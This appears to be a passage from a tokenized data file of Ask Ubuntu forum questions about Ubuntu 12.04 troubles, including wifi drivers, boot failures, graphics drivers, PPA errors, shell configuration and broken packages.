phy0 : wireless lan soft blocked : no hard blocked : no echo `` options iwlwifi 11n_disable=1 '' | sudo tee /etc/modprobe.d/iwlwifi.conf options iwlwifi 11n_disable=1 sudo modprobe -rfv iwlwifi warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . rmmod /lib/modules/3.2.0-24-generic/kernel/drivers/net/wireless/iwlwifi/iwlwifi.ko rmmod /lib/modules/3.2.0-24-generic/kernel/net/mac80211/mac80211.ko rmmod /lib/modules/3.2.0-24-generic/kernel/net/wireless/cfg80211.ko sudo modprobe iwlwifi warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . replacing iwlwifi-1000-5.ucode ( current driver ) against iwlwifi-1000-3.ucode sudo jockey-gtk : ( jockey-gtk:2493 ) : gtk-critical ** : gtk_icon_set_render_icon_pixbuf : assertion icon_set ! = null ' failed ( jockey-gtk:2493 ) : gtk-critical ** : gtk_icon_set_render_icon_pixbuf : assertion icon_set ! = null ' failed nothing is listet in `` additional drivers '' ( german : `` zus채tzliche treiber '' ) . gksudo gedit /etc/modprobe.d/blacklist.conf add `` blacklist acer_wmi '' any help would be appreciated very much . thanks ! !
131913	ubuntu 12.04 not starting	i have upgraded to 12.04 a few days ago and it was working just fine yesterday . i just tried to boot ubuntu now for a couple of tries and it gets to he 5 purple dots and stops . not sure what to do . it is on a dual boot so i have windows but that is not exactly ideal .
131919	wireless keeps asking for password	i just installed 12.04 on my old ibook g3 ( since i wiped the hdd ) now luckily i have a wifi ethernet bridge on my pc to give the ibook internet . but even when it is connected to eth0 ( lan ) it keeps asking to connect to eth1 ( wi-fi ) the router is using wpa2 personal with aes i was just wondering , because the router is upstairs and the ibook is downstairs next to my pc . and the wifi connects upstairs , but i ca n't use it up there cos the battery is junk and i got no plugs that 'll reach .
131923	can not enable or remove gnome-shell extension	i have installed the classic systray from the webupd8 gnome3 ppa . i use gnome-shell 3.4 with precise , and this package is available for those . the problem is that i can not enable it in the gnome tweak tool . when i enable it nothing changes , and when i close gnome tweak and restart it it is disabled again . if i go to extensions.gnome.org and try to enable it from there the same happens . the weird thing is that classic systray is still in the list when i remove the package . is n't it normal that the extension will disappear in the list when it 's deleted ? and i have tried to reinstall it many times , but nothing seems to work . does anyone know how to fix it ?
131928	how can i install the ubuntu 12.04 without downloading ubuntu-12.04-wubi-amd64.tar.xz ?	everytime when i want to install the ubuntu , it calls me to download the ubuntu-12.04-wubi-amd64.tar.xz ! because of my poor network , it makes me crazy ! how can i install the ubuntu 12.04 without downloading ubuntu-12.04-wubi-amd64.tar.xz ?
131934	internal error message pops up after each time system is rebooted	i had installed ubuntu 12.04 using wubi . but each time i boot the system , an internal error message pops up . as shown below : executable path /usr/share/apport/apport-gpu-error-intel.py package xserver-xorg-video-intel 2:2.17.0-1ubuntu4 problem type crash apportversion 2.0.1-0ubuntu7 and so on . i had earlier upgraded to ubuntu 12.04 from ubuntu 11.10 . and encountered the same issue . hence i uninstalled the os and reinstalled using wubi . i had posted the same query in ubuntu.com/support ( question number : 195525 ) but could n't find a solution . i am using dell inspiron with intel pentium . need your help in resolving this issue .
131937	setting nomodeset to fix blank screen on boot breaks browser rendering	i have upgraded my wifes netbook ( novatech x10 ) from 10.04 to 12.04 and hit the same problem i had with 11.04 and 11.10 with the blank screen on boot . i can fix this by adding the nomodeset option to grub but this seems to make the graphics experience slightly worse ( it does not seem as clear ) also the web browsers firefox/chrome do not render the screen width correctly . currently i am working around it by not setting nomodeset` and telling my wife to close the lid after boot and reopen it ( the screen then works ) but she is complaining about this and wishing `` i had not messed with it '' any ideas at all ? lspci shows the controller as intel corporation n10 family integrated graphics controller '' i have not installed any other drivers , and the additional drivers search did not find any . thanks andi
131938	sorry , ubuntu 12.04 has suffered an internal program error	after upgrading from 11.10 to 12.04 ( having solved the problem of ubuntu being a cock and booting into low res graphics mode ) i now keep receiving : 'sorry , ubuntu has suffered an internal program error . ' each time it seems to give a different file location as the problem . then , as if that was n't enough , i send a problem report and that crashes too . these crashes are random . also , and i do n't know if this is related , i suffer complete , random system crashes . it can be minutes or , hours , after booting . it just goes blank and i have to press the power button . after i reboot , one or , both , of my 2tb external hdds can not be mounted by ubuntu because they were not unmounted correctly . the actual advice given by ubuntu is to plug them into a windows system . i do and they can be read perfectly . can anyone help ?
131940	is there an ubuntu 12.04 netbook edition ?	is there a separate ubuntu 12.04 netbook edition ? this page http : //www.ubuntu.com/download does not show one . however , my older 10.04 had separate editions for desktop and netbook .
131944	i ca n't watch the flash video ( e.g . youtube ) with a fresh install of ubuntu 12.04	i 'm running precise pangolin in my desktop pc ; it works globally , but i ca n't watch any kind of flash video on the web . i 've installed flashplugin-installer and ubuntu-restricted-extras , like suggests in the answers , but nothing changes . maybe the problem is my nvidia geforce3 ? ? ?
131953	i can not find some the software i want in ubuntu software center	i just installed ubuntu 12.04 in my pc ( fresh ) i tried to install some software i wanted from ubuntu software center but some of them were not found . it shows this error : '' there isn’t a software package called “gimp” in your current software sources . '' updating cache querying softwares sources what should i do to fix this error ?
131954	how to upgrade from 8.10 to 12.04 ?	im using now ubuntu 8.10 . i want to upgrade it to 12.10 . when i click on update manager it shows 9.04 is available . when i click to install it , it shows following error message in pop up window `` failed to extract-extracting the upgrade failed . there may be a problem with the network or with the server '' . is there any solution to resolve this ?
131961	copy lines in a file and paste it into a new file	i have 12 files each containing 10 lines . i need to copy the content of the first file to a new file ( new.txt ) then i need to copy the lines 6 to the end ( 10 ) of the 11 remaining files in the same new.txt anybody knows any tips to do that ? regards , serge
131964	ati radeon hd 3200 graphics driver - installation problem	i have a fresh installation of ubuntu 12.04 x86 and i am trying to install the proprietary driver for my `` radeon hd 3200 graphics '' video card . i know that there are already many threads about this topic , but i did not find a solution for my problem : for the installation i followed exactly these instructions : what is the correct way to install ati catalyst video drivers in 12.04 lts ? during the process i faced these problems : i executed ~ $ debconf libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases and got : debconf : dbdriver `` passwords '' warning : could not open /var/cache/debconf/passwords.dat : keine berechtigung ca n't exec `` libstdc++6 '' : datei oder verzeichnis nicht gefunden at /usr/share/perl/5.14/ipc/open3.pm line 186. open2 : exec of libstdc++6 dkms libqtgui4 wget execstack libelfg0 dh-modaliases failed at /usr/share/perl5/debconf/confmodule.pm line 59 ( translation of the german parts : `` keine berechtigung '' means : `` no permission '' ; `` datei oder verzeichnis nicht gefunden '' means : `` file or folder not found '' ) because i had no idea if it was a big issue , i just continued : ~ $ sudo apt-get install ia32-libs there i got : paketlisten werden gelesen ... fertig abhängigkeitsbaum wird aufgebaut statusinformationen werden eingelesen ... fertig paket ia32-libs ist nicht verfügbar , wird aber von einem anderen paket referenziert . das kann heißen , dass das paket fehlt , dass es abgelöst wurde oder nur aus einer anderen quelle verfügbar ist . e : paket »ia32-libs« hat keinen installationskandidaten ( translation : [ ... ] the package ia32-libs is not available but is referenced by an other package [ ... ] e : package »ia32-libs« has no installation candidate ) once more i went on . the next steps worked quite fine . but when i came to the point : ~ $ sudo dpkg -i *.deb there i got a popup message , something like there was a problem with a system application but in the terminal no errors were reported , also the packages seemed to be installed . so now the ati catalyst center works amdcccle but fglrxinfo gave me x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 139 ( atifglextension ) minor opcode of failed request : 66 ( ) serial number of failed request : 13 current serial number in output stream : 13 so there is something wrong . ( also there is not the possibility to enable these nice graphical features - the reason why i installed the proprietary driver ) because i worked with a completely fresh installation i do n't know how to fix the problem . if anybody could help i would be very tahnkful ! = )
131967	screen turn off/crazy when i adjust my screen brightness continuously on a dell studio 1558	i have a dell studio 1558 , with a mobility radeon hd 4500/5100 series on unity 2d . after a clean install of ubuntu 12.04 , i rebooted and logged in to my ubuntu.the screen was too bright , so i press f4 to decrease the brightness . but when i pressed f4 repeatedly to decrease the brightness to 0 , my laptop screen turned off , i had to shutdown my laptop by pressing the power button . so i tested it again few times and got the same result , i tried to install the additional drivers ( ati/amd proprietary fglrx ) , tested it again , the screen did n't turned off but go crazy , and i still had to shutdown my laptop . i think may be this is happening due to the f4 key , i install xbacklight and used it to dim my screen brightness . if i try to set xbacklight -set 50 and then 40-30 ... my screen still dead ! not just the screen is dead , i must say the laptop is dead , i can open any command prompt . event when i try to close the lid , the laptop does n't suspend . just tried to install gnome-shell , every thing seems to work ok !
131968	installing ubuntu 12.04 alongside ubuntu 10.04	i 'm running ubuntu 10.04 on a netbook with a 160g hard drive . if i want to change to ubuntu 12.04 , there are 3 options : upgrade to 12.04 erase hard disk and make a clean install of ubuntu 12.04 install ubuntu 12.04 alongside ubuntu 10.04 on a new partition i 'm very happy with ubuntu 10.04 and i do n't want dump it , so i want to install ubuntu 12.04 alongside ubuntu 10.04 creating 80 gb of free space on hard disk and installing it just there . will grub show both ubuntu 10.04 and ubuntu 12.04 or only one when i boot up the netbook ?
131973	lenovo 3000 n 200 touchpad malfunction in ubuntu 12.04	somebody please rectify this bug . the touch pad automatically selects the area and other icons if i try to hover anywhere on desktop . the launcher icons will be picked up automatically if i try to click them to operate . icons behave as if i am trying to lift them and drop on desktop .
131976	how to install startupmanager in 12.04 ?	i installed 12.04 today . i have two hard disks and separate os . i want to install startupmanager . i previously installed startupmanager in 11.10 for dual hard disk booting with xp but after 12.04 installation ( fresh installation ) , startupmanager was not found in software center . how do i install startupmanager on 12.04 ?
131979	how to install synaptic package manager ?	i tried to install synaptic package manager but i get the following error message : package dependencies can not be resolved . this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time .
131981	printing pdfs on 12.04	a strange problem here - upgraded to 12.04 and since then if i print a pdf it prints all the text content perfectly , but leaves a blank where an image ought to be ! the print preview sometimes shows the image and sometimes it does n't . any ideas ? my printer is a canon i9950 , so i print through turboprint . there were no problems with earlier versions of ubuntu , but with 12.04 there is . according to turboprint , the problem is caused by an incompatibility between evince ( the pdf viewer ) and ghostscript as used by turboprint . so i 'll try a different pdf reader . i 've also just noticed that the images that do n't print were originally pngs - jpegs are fine .
131982	adding ppa 's results in `` could n't resolve host 'launchpad.net ' ''	for example , after running this command : sudo add-apt-repository ppa : tualatrix/ppa i get the following output : traceback ( most recent call last ) : file `` /usr/bin/add-apt-repository '' , line 125 , in < module > ppa_info = get_ppa_info_from_lp ( user , ppa_name ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/ppa.py '' , line 80 , in get_ppa_info_from_lp curl.perform ( ) pycurl.error : ( 6 , `` could n't resolve host 'launchpad.net ' '' ) why does this happen ? i just installed ubuntu 12.04 lts . and it works fine . i have updated and installed the system . i have even installed all required packages . but the thing is as soon as i want to install more packages , like ppa 's and that sort of thing , i am not able to do so . until now i have not been able to install any ppa . i am working behind a proxy .
131983	when my screen is locked , will running processes/internet connection be halted ?	sometimes i leave my pc doing other stuff while running an upgrade or downloading big files , syncing my dropbox , or something like that . after 10mins or so , my screen is locked ( which i like ) . i just wanted to know if running processes or the internet connection will be locked too when that happens . because i do n't want to do that stuff after i get back on my pc again . and if that 's the case ( halted processes ) , is there a way to keep processes / connection running while the screen is locked ?
131987	ubuntu install error	i get the following error when installing ubuntu 12.04 : *stooping cpu interrupts balancing deamon ... ... ... ... ... ... ... ... ... ... [ ok ] this is printed on black screen . i get this when i want to move from step 8 to step 9 of this guide . any suggestions ?
131988	url address of local file not working	i 'm trying to upload a photo to a blogger widget . i have the code : ( i changed the angle brackets for curly brackets ) { a href= '' http : //company.com/ampers '' } { img src= '' ~/desktop/picture.png '' / } extra wording here { /a } this does n't work . i 've also tried ~/home/desktop/picture.png any suggestions ? i have searched the web but am probably not wording my question correctly .
131990	distro upgrade interrupted , cant upgrade to precise	i do n't have the opportunity to upgrade by using live usb and live cd , and since the distro-upgrade was interrupted , no partial upgrade is possible . how can i fix this ? i found an upgrading-tool named upgrade-manager-kde and installed it , but i have no idea how to make it work , since it does n't show on any menu .
131996	vlc sound is too low in 12.04 compared to 11.10	one of the best features of ubuntu that i really , really like is its ability to increase the volume to beyond 100 % , and that was true for 11.10 , and still here in 12.04 . but my vlc player 's volume is just too low in 12.04 compared to when i was in 11.10 . in 11.10 , i would set vlc 's application volume in the sound settings to almost its maximum and the output volume to around 137 % . then i will just adjust the volume of vlc player to my preferences . but here in 12.04 , once i adjust the volume on vlc player , it will also adjust vlc 's application volume in the sound settings . did i just encountered a bug in my sound settings during 11.10 and was corrected in 12.04 or something really changed ? i 've tried experimenting with the audio settings of vlc but to no avail . vlc player is my default media player , since i 'm pretty familiar with it already . hope somebody can help me .
131999	uninstall broken package	times ago i have installed linux mint stuff on my ubuntu 11.10 ( now 12.04 ) . i accidentally removed some files manually ( they were under /usr/share ) . now it is impossible to remove the related deb packages , and synaptic report various errors . how can remove them bypassing errors ? it is possible view the installed files in synaptic and remove them manually , but is tedious ... also remain the problem to remove the files entry from the apt database . any suggestion ?
132008	workspace switcher keyboard shortcuts for left and right workspaces not responding	i 'm running ubuntu 12.04 64-bit ( running as a vm on vmware player ) . the keyboard shortcut for workspace switcher indicates that ctrl+alt+ arrow keys switches to the desired workspace . while this works for up/down arows , using ctrl+alt+ left/right does n't seem to work - the switcher does n't move to the desired workspace . am i doing something wrong here ?
132012	artheros ar9287 txpower	i 'm using ubuntu 12.04 lts on my aspire 3820tg which comes with an artheros ar9287 . somehow the wireless performance is to put it mildly sub-optimal . i thought it might have something to do with the txpower which is only at 13 dbm but unfortunately i 'm unable to set it to a higher level . any ideas how to increase the sending power or how to improve the performance in general ? thanks a lot in advance jo
132027	after running 12.04 from live usb , windows 7 installation can not load network drivers	so basically yesterday i downloaded the 12.04 , and i created a live usb , and booted it on my laptop . everything was great , everything worked . then i needed to do something on windows , and when i logged into windows , i couldnt access internet . i tried to set up new network , but it prompted me that no network hardware found ! then i proceeded to check the device manager , and sure enough all network related hardware had exclamations marks beside it . when i checked properties , it said it is not working because cant load drivers . i even browsed to location where those drivers supposed to be , and all corresponding files are there . anyone knows what could have happened ?
132033	how to disable unity style notification when using gnome shell	i just install gnome shell for my ubuntu 12.04 , when i try to use empathy , the notification just show up like when using unity . this is known as a bug , but how can i fix it ? i i 'm willing to remove this annoying osd to live with true gnome shell !
132037	how do i view the keyboard buffer ?	i would like to be able to find some passwords i forgot to wright down . i use ubuntu 12.04 lts . update i realize i cant find passwords on the buffer but i would like to know how to read the keyboard buffer through the terminal .
132038	key.is_pressed ( ) in gi.repository.gdk ?	i was wondering if anyone knew how to detect if a key is currently pressed with either gtk or gdk and python ? i do n't want to use the key-pressed or key-released event for this scenario , but rather check if it is currently pressed on application startup . specifically , here is what i would like my application to do : begin opening by keyboard shortcut . wait 2 seconds . if keyboard shortcut is still held after 2 seconds , show the window . if , at any point during the 2 second timer , the keyboard shortcut was released , do not show the window , and exit . this is similar to the functionality seen in the unity keyboard shortcut overlay , where you hold the super key for 2 seconds and the window is displayed . if there is a better way to do this ( preferably without the program running in the background and waiting ) , that would be acceptable as well . hoping for the best , sean
132047	redshift indicator usage	i use this command when starting the computer : gtk-redshift-l 36.47 : -6.20 6400:4400-g 0.8-m-v vidmode the first question is whether i 've used this command correctly , and the second is whether the program needs to be running both at night and during the day . i think so because of day and night changes -- please correct me if i 'm wrong . ( without translation : dos preguntitas sobre este programita tan útil . yo tengo este comando al iniciar ordenador : gtk-redshift -l 36.47 : -6.20 6400:4400 -g 0.8 -m vidmode -v la 1era pregunta es sobre si este comando esta bien utilizado y la 2ª es saber si el programa siempre tiene que estar activo , tanto en la noche como en el día . yo creo que sí porque según el día y la noche va cambiando -- corriganme si me equivoco . )
132048	how to make a login screen display an auto-changing background ?	is there a way to make the login screen show an auto-changing background , as to be able to create an animation-like screen ? i have used ubuntu-tweak but that did n't help . can i manually edit the configuration files to add an array of images or something ?
132050	ca n't change theme of zsh in ubuntu 12.04	i have changed the theme in my ~/.zshrc file however whilst some of the colors in the prompt change the text size and background color remain as the ubuntu default . any one know how i can override this to make my terminal purse zsh with the correct theme . my .bashrc looks like this # ~/.bashrc : executed by bash ( 1 ) for non-login shells . # see /usr/share/doc/bash/examples/startup-files ( in the package bash-doc ) # for examples # if not running interactively , do n't do anything [ -z `` $ ps1 '' ] & & return # do n't put duplicate lines or lines starting with space in the history . # see bash ( 1 ) for more options histcontrol=ignoreboth # append to the history file , do n't overwrite it shopt -s histappend # for setting history length see histsize and histfilesize in bash ( 1 ) histsize=1000 histfilesize=2000 # check the window size after each command and , if necessary , # update the values of lines and columns . shopt -s checkwinsize # if set , the pattern `` ** '' used in a pathname expansion context will # match all files and zero or more directories and subdirectories . # shopt -s globstar # make less more friendly for non-text input files , see lesspipe ( 1 ) [ -x /usr/bin/lesspipe ] & & eval `` $ ( shell=/bin/sh lesspipe ) '' # set variable identifying the chroot you work in ( used in the prompt below ) if [ -z `` $ debian_chroot '' ] & & [ -r /etc/debian_chroot ] ; then debian_chroot= $ ( cat /etc/debian_chroot ) fi # set a fancy prompt ( non-color , unless we know we `` want '' color ) case `` $ term '' in xterm-color ) color_prompt=yes ; ; esac # uncomment for a colored prompt , if the terminal has the capability ; turned # off by default to not distract the user : the focus in a terminal window # should be on the output of commands , not on the prompt # force_color_prompt=yes if [ -n `` $ force_color_prompt '' ] ; then if [ -x /usr/bin/tput ] & & tput setaf 1 > & /dev/null ; then # we have color support ; assume it 's compliant with ecma-48 # ( iso/iec-6429 ) . ( lack of such support is extremely rare , and such # a case would tend to support setf rather than setaf . ) color_prompt=yes else color_prompt= fi fi if [ `` $ color_prompt '' = yes ] ; then ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \ [ \033 [ 01 ; 32m\ ] \u @ \h\ [ \033 [ 00m\ ] : \ [ \033 [ 01 ; 34m\ ] \w\ [ \033 [ 00m\ ] \ $ ' else ps1= ' $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\ $ ' fi unset color_prompt force_color_prompt # if this is an xterm set the title to user @ host : dir case `` $ term '' in xterm*|rxvt* ) ps1= '' \ [ \e ] 0 ; $ { debian_chroot : + ( $ debian_chroot ) } \u @ \h : \w\a\ ] $ ps1 '' ; ; * ) ; ; esac # enable color support of ls and also add handy aliases if [ -x /usr/bin/dircolors ] ; then test -r ~/.dircolors & & eval `` $ ( dircolors -b ~/.dircolors ) '' || eval `` $ ( dircolors -b ) '' alias ls='ls -- color=auto' # alias dir='dir -- color=auto' # alias vdir='vdir -- color=auto' alias grep='grep -- color=auto' alias fgrep='fgrep -- color=auto' alias egrep='egrep -- color=auto' fi # some more ls aliases alias ll='ls -alf' alias la='ls -a' alias l='ls -cf' # add an `` alert '' alias for long running commands . use like so : # sleep 10 ; alert alias alert='notify-send -- urgency=low -i `` $ ( [ $ ? = 0 ] & & echo terminal || echo error ) '' `` $ ( history|tail -n1|sed -e '\ '' s/^\s* [ 0-9 ] \+\s*// ; s/ [ ; & | ] \ s*alert $ //'\ '' ) '' ' # alias definitions . # you may want to put all your additions into a separate file like # ~/.bash_aliases , instead of adding them here directly . # see /usr/share/doc/bash-doc/examples in the bash-doc package . if [ -f ~/.bash_aliases ] ; then . ~/.bash_aliases fi # enable programmable completion features ( you do n't need to enable # this , if it 's already enabled in /etc/bash.bashrc and /etc/profile # sources /etc/bash.bashrc ) . if [ -f /etc/bash_completion ] & & ! shopt -oq posix ; then . /etc/bash_completion fi path= $ path : $ home/.rvm/bin # add rvm to path for scripting and my .zshrc looks like this : # path to your oh-my-zsh configuration . zsh= $ home/.oh-my-zsh # set name of the theme to load . # look in ~/.oh-my-zsh/themes/ # optionally , if you set this to `` random '' , it 'll load a random theme each # time that oh-my-zsh is loaded . zsh_theme= '' dallas '' # example aliases # alias zshconfig= '' mate ~/.zshrc '' # alias ohmyzsh= '' mate ~/.oh-my-zsh '' # set to this to use case-sensitive completion # case_sensitive= '' true '' # comment this out to disable weekly auto-update checks # disable_auto_update= '' true '' # uncomment following line if you want to disable colors in ls # disable_ls_colors= '' true '' # uncomment following line if you want to disable autosetting terminal title . # disable_auto_title= '' true '' # uncomment following line if you want red dots to be displayed while waiting for completion # completion_waiting_dots= '' true '' # which plugins would you like to load ? ( plugins can be found in ~/.oh-my- zsh/plugins/* ) # custom plugins may be added to ~/.oh-my-zsh/custom/plugins/ # example format : plugins= ( rails git textmate ruby lighthouse ) plugins= ( git ) source $ zsh/oh-my-zsh.sh # customize to your needs ... export path=/home/toaksie/.rvm/gems/ruby-1.9.3-p194/bin : /home/toaksie/.rvm/gems/ruby- 1.9.3-p194 @ global/bin : /home/toaksie/.rvm/rubies/ruby-1.9.3- p194/bin : /home/toaksie/.rvm/bin : /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : / usr/sbin : /usr/bin : /sbin : /bin : /usr/games any help much appreciated !
132053	how to remove a half-installed package ? ( sun jdk - java )	i 've tried installing sun jdk from sudo add-apt-repository ppa : eugenesan/java , it failed with the following : downloading ... -- 2012-05-05 15:50:09 -- http : //download.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving download.oracle.com ( download.oracle.com ) ... 80.239.230.162 connecting to download.oracle.com ( download.oracle.com ) |80.239.230.162|:80 ... connected . http request sent , awaiting response ... 302 moved temporarily location : https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz [ following ] -- 2012-05-05 15:50:09 -- https : //edelivery.oracle.com/otn-pub/java/jdk/7u3-b04/jdk-7u3-linux-x64.tar.gz resolving edelivery.oracle.com ( edelivery.oracle.com ) ... 2.17.254.174 connecting to edelivery.oracle.com ( edelivery.oracle.com ) |2.17.254.174|:443 ... connected . http request sent , awaiting response ... 302 moved temporarily location : http : //download.oracle.com/errors/download-fail-1505220.html [ following ] -- 2012-05-05 15:50:09 -- http : //download.oracle.com/errors/download-fail-1505220.html connecting to download.oracle.com ( download.oracle.com ) |80.239.230.162|:80 ... connected . http request sent , awaiting response ... 200 ok length : 5307 ( 5.2k ) [ text/html ] saving to : `./jdk-7u3-linux-x64.tar.gz' 0k ... .. 100 % 20.5m=0s 2012-05-05 15:50:09 ( 20.5 mb/s ) - `./jdk-7u3-linux-x64.tar.gz ' saved [ 5307/5307 ] download done . sha256sum mismatch jdk-7u3-linux-x64.tar.gz oracle jdk 7 is not installed . dpkg : error while cleaning up : subprocess installed post-installation script returned error exit status 1 errors were encountered while processing : oracle-java7-installer so apparently it 's trying to fetch a bad url . i 've installed java manually , but now the package is stuck as a half-installed and every time i apt-get install anything , the error appears again . apt-get install -f shows `` 1 not fully installed or removed . '' package and fails with the same error . i 've tried dpkg -p oracle-java7-installer , but it fails as well . how to remove this half-installed package ?
132059	how to make a package manager wait if another instance of apt is running ?	i have seen many softwares such as update manager and synaptic package manager , they wait if some other program is using the /var/lib/dpkg/lock and is locked . how can we do this through the terminal ? i saw apt-get 's manual but did n't find anything useful .
132076	update unresolvable problem	when i am try to update my system , i am getting the following error : could not initialise the package information an unresolvable problem occurred while initialising the package information . please report this bug for the 'update-manager ' package and try to include the following error message : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' how can i resolve this ? thank you .
132078	how to uninstall draftsight in 12.04	i install draftsight in 12.04 but it the display does not appear . pls help me how to fix it or uninstaall the draftsight.. thanks
132079	how do i change uuid of a disk to whatever i want ?	i have an unique situation where i need to change uuid of usb flash drive to previous uuid . i formatted it and obviously number changed ... i 've ubuntu server setup with 1tb hdd , and 4gb usb flash drive to boot from . grub on hdd is configured for uuid which changed when i formated usb drive and reinstalled ubuntu server . i 've no external monitor , so i attach usb to laptop and install server there ... than i move it to server hardware . as i mentioned my problem is that i need usb to go back to previous uuid , otherwise server wo n't boot . and i can not get external monitor till monday ! : ) i know i need these files changed afterwards : the files for which uuid is most critical : /boot/grub/menu.lst /etc/fstab /etc/initramfs-tools/conf.d/resume but i can not find anywhere on the net info about customizing uuid . anyone ?
132083	cant boot after upgrade to 12.04	a few days ago i updated my kubuntu 11.10 to 12.04 via the update-manager . it asked me to restart , but now i cant boot my system anymore . when i try to boot , all i get is the grub menu and no matter which option i choose ( i tried the recovery mode and every older version i had ) all i get is ata_id [ 321 ] : hdio_get_identity failed for '/dev/sdb/ ' : invalid argument and then it just restarts . when i remove the splash and quit option from the grub.cfg i see a few more lines before it restarts . its way too fast to really read it , but i saw something about generel error mounting filesystems . i cant even get to root shell . any ideas how to fix this problem via live system ?
132090	ubuntu 12.04 x86 inside vmware workstation 8	i 'm trying to install ubuntu 12.04 x86 inside vmware workstation 8 . however i think the process the stuck . its just showing `` retrieving file 43 of 105 '' from the last 45 mins or so . is it normal ? thanks .
132091	12.04 no audio from hdmi after switching monitor off / on	when booting ubuntu 12.04 , i have sound coming from my speakers through hdmi , except the start up sound ( not a big deal ) . my card is listed in the sound settings . if i switch inputs on my monitor , the card ( radeon hd 5450 ) disappears . i have tried both the proprietary drivers and open source drivers and nothing seems to fix it . as a side note my video settings do n't stick after changing them . ie . pixel format , gpu scaling , etc . i have this monitor connected with hdmi and also have a vga cable connected to run a kvm switch , but 99 % of the time run with the hdmi connection . anyone have any ideas ?
132093	is it good practice to backport source packages from newer ubuntu releases ?	my plan is like this : say i 'm running 12.04 lts , life is good , but its packages guadually become old . then 12.10 is out , i add a deb-src line in my sources.list , and backport ( download source , build , install ) selected packages from the new release . since the new release is supported , i should get security updates , on which case i will backport the updated versions . the system is still stable , and i get the new packages that i want , even with security updates ( which i do n't get if i go the debian route and backport from testing ) . now the questions : is this plan as good as i think it is ? i think it 's the best i can get if i want maximum stability and security on the condition that i get these new packages i absolutely need . right ? wrong ? if it 's a good plan , how to do it in practice ? in an ideal world , i think i should be able to just apt-get install something , and if the version with the highest priority comes from a deb line , install the package ; if it comes from a deb-src line , download source , build , and install . but apparently the reality is n't so rosy , not only do i have to do extra work building and installing a source package , but i also can not find a way to tell when there is a new version of the package from that repository ! when i do apt-cache policy something , only the deb lines are listed . why are source repositories discriminated against ? how can i track a source repository and install upgrades as they come out ?
132094	fix hibernate on thinkpad x60 with 12.04 precise pangolin	i own a thinkpad x60 , hibernate used to work on 10.04 lucid lynx , but no longer works correctly on 12.04 . i am aware of how to enable hibernate in power manager . the problem here is , in the default configuration , pm-hibernate works , but the system fails to resume correctly . there is no video glitch , black screen or other . the resume process just freezes on the ubuntu splash boot after a few seconds of disk activity . is there a way to fix the system configuration so hibernates works again ?
132096	how do i enable nvidia drivers in recovery mode ?	how do i enable nvidia drivers in recovery mode ? i 've installed 12.04 via text mode with the alternate iso . it rebooted into the blank purple screen ; ubuntu bongos played . i 'm in recovery mode . apt says the nvidia-common is installed . jockey-text says nvidia-current and nvidia-current-updates are both installed but not enabled . it complains it can not find the module for either .
132099	ca n't get external wifi antenna to work , or find one that works	i have an external wifi antenna ( alfa ) , which worked with windows but not with ubuntu . my computer is a small laptop eee pc . the antenna plugs in usb . supposedly i have the driver for it , but i am told it is a pain to install ! ? ? also , on windows there was a way to turn the internal antenna and blue tooth on and off , but now there is n't ! so anyway , how can i : turn internal antennas off and external on install driver get this antenna to work or find another antenna that will work ?
132100	errors in dmesg - test wp failed , assume write enabled	i 'm experiencing some problems with drive cache and i do n't know what 's causing these problems . this is my dmesg : [ 11690.011238 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 11690.011248 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 11741.720851 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 11741.722965 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 11741.722975 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 11793.433011 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 11793.435347 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 11793.435356 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 11845.140846 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled [ 11845.143098 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed [ 11845.143102 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 11896.856723 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled there are hundreds of these lines . it is happening since i 've installed ubuntu 12.04 64bit beta2 from my pendrive . now i do n't have anything at /dev/sdb . i do n't know if these errors are making my system less responsive , but i think that dmesg should n't look like this . my kernel version : 3.2.0-24-generic . do you have any idea how to solve it ? thank you in advance .
132102	having minimize issues running games in wine with gnome shel	ok , i have 4 computers all running ubuntu 12.04 with gnome shell . on all computers when ever i play games in wine i set wine to run in a virtual desktop . on the first 3 computers i can use things like `` alt-tab '' and i can use the `` super/windows '' key to get into overview mode while playing games and it functions absolutely flawless , i can even move the game to another deaktop and continue playing . however on the 4th computer neither `` alt-tab '' or `` super '' do anything , as a matter of fact if i hit them more than once the window will loose focus and i have to shutdown to get out of the game . i also noticed on the 4th computer that the volume popup for gnome shell doesnt diplay either , but it does on the other 3 . all 4 computers are running ubuntu 12.04 ( fully up-to-date ) , and they are all running gnome shell ( fully up-to-date from the offical gnome 3 ppa ) . all computers have thier respective proriatary graphics drivers installed . 1st : works fine amd cpu and amd radeon hd6850 graphics 2nd : works fine amd cpu ( mobile ) and amd radeon hd 6520g graphics 3rd : works fine ( only pc running 32bit ubuntu ) amd cpu and nvidia geforce gts 250 graphics 4th : doesnt work amd cpu and ati radeon hd4850 graphics edit : a friend of mine is also running 12.04 64bit with gnome shell and a radeon hd 4850 , he is also not able to do this either . could it be something specific to the hd4850 ? i can do it just fine on my hd 6850 .
